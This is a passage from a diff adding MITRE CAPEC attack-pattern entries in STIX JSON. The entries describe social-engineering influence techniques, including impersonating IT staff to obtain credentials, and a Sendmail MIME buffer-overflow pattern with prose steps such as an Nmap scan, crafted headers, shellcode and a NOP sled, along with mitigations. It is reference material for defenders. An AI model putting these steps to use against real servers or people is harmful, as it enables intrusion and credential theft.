"Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the 
perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate pattern.", + "external_references": [ + { + "external_id": "CAPEC-419", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/419.html" + } + ], + "id": "attack-pattern--c5724646-0a5b-4b60-b0e2-6c445a744628", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Perception of Concession", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. 
Attack points exist when data are converted to MIME compatible format and back.", + "external_references": [ + { + "external_id": "CAPEC-42", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/42.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "CERT Advisory CA-1997-05 MIME Conversion Buffer Overflow in Sendmail Versions 8.8.3 and 8.8.4, Software Engineering Institute: Carnegie Mellon University", + "external_id": "REF-364", + "source_name": "reference_from_CAPEC", + "url": "http://www.cert.org/advisories/CA-1997-05.html" + } + ], + "id": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "MIME Conversion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify 
Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.\n Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.See also: CVE-1999-0047" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target mail server: The adversary identifies a target mail server that they wish to attack.

  2. Techniques
    Use Nmap on a system to identify a mail server service.
  3. Determine viability of attack: Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4).

Experiment

  1. Find injection vector: Identify places in the system where vulnerable MIME conversion routines may be used.

  2. Craft overflow content: The adversary crafts e-mail messages with special headers that will cause a buffer overflow for the vulnerable MIME conversion routine. The intent of this attack is to leverage the overflow for execution of arbitrary code and gain access to the mail server machine, so the adversary will craft an email that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target system uses a mail server.", + "Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system." + ], + "x_capec_skills_required": { + "High": "Causing arbitrary code to execute on the target system.", + "Low": "It may be trivial to cause a DoS via this attack pattern" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Stay up to date with third party vendor patches", + "id": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b0ebb42-718a-4b46-8ffb-8ce77603ff60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Disable the 7 to 8 bit conversion. 
This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "id": "course-of-action--d30a8d26-316b-40c2-962a-2bd36e335124", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8c0ae8f-535b-4df1-acd4-86068f0f66d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d30a8d26-316b-40c2-962a-2bd36e335124", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use the sendmail restricted shell program (smrsh)", + "id": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "modified": "2022-09-29T00:00:00.000Z", 
+ "name": "coa-42-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use mail.local", + "id": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--273ca915-2a10-4a89-8347-e45deeb8176d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the 
adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target's decision-making process.", + "external_references": [ + { + "external_id": "CAPEC-420", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/420.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Scarcity", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary sends an email to a target about a limited-time opportunity to claim a 
considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ee824b4-e2c0-4406-b7d9-9455b31c810c", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. 
By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-421", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/421.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Authority", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The adversary calls the target and announces that 
they are the head of IT at the target's company. The adversary goes on to say that there has been a technical issue and they need the target's login credentials for their account. By convincing the target of their authority, the adversary hopes the target will reveal the sensitive information." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e7aab7-ed20-4616-ae8f-4708e16de84c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. 
After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.", + "external_references": [ + { + "external_id": "CAPEC-422", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/422.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Influence Perception of Commitment and Consistency", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with 
the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d680be2b-c855-49c2-9b1f-929dd51b97e4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Individuals should avoid complying with suspicious requests.", + "id": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-422-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36560036-998b-4d8b-8e16-e766cd8d1876", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", 
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate themself with the target via actions, appearance, or a combination thereof.", + "external_references": [ + { + "external_id": "CAPEC-423", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/423.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Liking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an 
application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3cc5859-4cd7-4218-ad1f-c7047264db33", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. 
The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-424", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/424.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Consensus or Social Proof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." 
+ ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e6e89355-28b2-4f0e-be9d-bdaab0213673", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary's point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary's perspective. One technique of framing is to avoid the use of the word \"No\" and to contextualize responses in a manner that is positive. 
When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-425", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/425.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Target Influence via Framing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5843921-552b-4480-815d-43dc331c44bd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication.", + "id": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-425-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 